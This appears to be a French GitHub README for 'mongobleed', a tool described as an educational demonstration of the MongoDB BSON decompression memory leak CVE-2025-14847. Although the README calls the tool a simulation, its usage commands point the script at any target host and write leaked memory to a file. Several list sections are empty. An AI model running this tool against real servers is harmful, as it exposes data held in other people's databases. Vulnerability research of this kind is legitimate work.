
Outil de recherche éducatif démontrant la divulgation mémoire CVE-2025-14847 dans la décompression BSON de MongoDB. Simule les échecs de vérification des limites et les concepts de sécurité mémoire pour l'analyse de vulnérabilités.
Ce dépôt contient un outil de recherche éducatif conçu pour démontrer les concepts de sécurité mémoire derrière CVE-2025-14847, une vulnérabilité critique découverte dans l'implémentation de la décompression BSON de MongoDB. L'outil simule comment une vérification de limites incorrecte pendant la décompression peut entraîner une divulgation mémoire.
Cet outil démontre :
Prérequis
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
| Option | Défaut | Description |
|---|---|---|
--host | localhost | Hôte MongoDB cible |
--port | 27017 | Port MongoDB cible |
--min-offset | 20 | Longueur minimale du document à sonder |
--max-offset | 8192 | Longueur maximale du document à sonder |
--output | leaked.bin | Fichier de sortie pour les données divulguées |
Cette vulnérabilité met en lumière des problèmes plus larges dans la sécurité des bases de données :
Ressources officielles :